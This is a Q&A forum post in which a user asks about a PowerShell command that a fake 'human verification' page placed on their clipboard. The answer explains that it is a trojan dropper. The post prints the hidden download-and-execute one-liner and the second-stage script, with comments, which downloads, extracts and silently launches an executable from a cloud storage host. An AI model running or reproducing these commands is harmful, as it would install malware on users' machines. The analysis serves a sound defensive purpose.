windowspowershellcmdtrojan

What does this command prompt input do?

This is the input:

cmd.exe /c powershell -WindowStyle Hidden -Command "$rQd='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"

This was on my clipboard after clicking a "human verification" button on some video download webapp. It told me that, in order to verify, I must hit Win + R, Ctrl + V, then Enter.

Thankfully, I already know what Win + R does, so I didn't follow those "verification instructions."

It looks like it downloads something, but I'm not sure what else.

Solution

  • To help you understand what the command is doing and perhaps helping future readers with similar issue, this is indeed downloading and executing a Trojan.

    In simple steps how you can determine this, first check the URL content with Invoke-RestMethod:

    Invoke-RestMethod https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt

    You will see that the content is a PowerShell script. Immediately after you can see the suspicious run.zip at the top of the script, if you paste the .zip URL in https://www.virustotal.com/ you can see that it is indeed malicious:

    virustotal

    Aadding comments to understand what the code does:

    # defines download file
$zxty = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.zip'
# defines destination file for the zip
$qbrw = "$env:APPDATA\file_azlm5.zip"
# defines destination folder for the zip
$lpmk = "$env:APPDATA\Install_4278"
# defines destination path for the extracted `.exe` from this zip
$vkdy = Join-Path $lpmk 'spPortableRun.exe'

# if the destination folder doesnt exist
if (!(Test-Path $lpmk)) {
    # creates it
    New-Item -Path $lpmk -ItemType Directory
}

try {
    # tries to download `run.zip` to destination file `file_azlm5.zip`
    $ghwd = New-Object System.Net.WebClient
    $ghwd.DownloadFile($zxty, $qbrw)
}
catch {
    exit
}

try {
    Add-Type -AssemblyName 'System.IO.Compression.FileSystem'
    # extract the downloaded zip to destination folder `Install_4278`
    [System.IO.Compression.ZipFile]::ExtractToDirectory($qbrw, $lpmk)
    # and delete the zip file
    Remove-Item $qbrw -Force
}
catch {
    exit
}

try {
    # starts the trojan extracted from the zip file
    # (should've been `spPortableRun.exe` in `Install_4278` folder)
    Start-Process -FilePath $vkdy -WindowStyle Hidden
}
catch {
    exit
}

    And to summarize with comments, the -Command you would be executing:

    # defines content URL
$rQd = 'https://fixedzip.oss-ap-southeast-5.aliyuncs.com/run.txt'
# creates a WebClient object
$pLs = New-Object System.Net.WebClient
# download the string content
# (this is pretty much like using `Invoke-RestMethod`)
$sLf = $pLs.DownloadString($rQd)
# `Invoke-Expression` here invokes the PowerShell script
# embedded in the string content 
Invoke-Expression $sLf